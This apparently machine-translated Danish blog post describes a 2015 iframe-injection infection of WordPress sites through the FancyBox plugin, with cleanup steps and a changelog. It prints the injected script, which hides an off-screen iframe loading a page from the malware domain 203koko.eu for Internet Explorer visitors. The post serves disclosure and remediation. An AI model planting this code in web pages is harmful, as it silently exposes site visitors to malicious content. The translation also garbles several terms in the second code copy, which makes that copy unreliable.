I begyndelsen af ​​ugen, en række websteder og blogs med WordPress, modtaget advarsler om malware infektion ved Google Webmasters.

Problemet til hvilket Google Webmasters henviser til tilstedeværelsen af ​​en torsk / manuskript iframe malware på kildewebsiderne.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Det ser ud til, at det drejer sig om en sårbarhed -en PluginErhvervelseFancyBox til WordPress som indtil i går (05.02.2015) ikke var blevet opdateret i lang tid.
Løsning af dette problem og desinfektion af virussteder med denne malware er det relativt enkelt.
1. Deaktiver FancyBox-pluginnet.
2. Slet alle FancyBox plugin-filer fra serveren (via FTP)
3. Installer den nye version af pluginnet (FancyBox 3.0.4)

FancyBox til WordPress 3.0.4

– Omdøbt indstillingen, der er påvirket af sikkerhedsproblemet nævnt i 3.0.3. Dette skulle forhindre den ondsindede kode i at blive vist på websteder, hvor pluginnet er opdateret uden at fjerne den ondsindede kode.

FancyBox til WordPress 3.0.3

– Rettede et sikkerhedsproblem.

Malware-oplysninger:

TYPE: Iframe-omdirigering
MÅL: WordPress Fancybox
MALWARE DOMÆNE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” bredde =”20″ højde=”30″ ></iframe>
MALWARE SCRIPT: <manuskript>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div stil=”position:absolut;venstre:-2000px;bredde:2000px”>

Fjern malware fra dit WordPress-websted.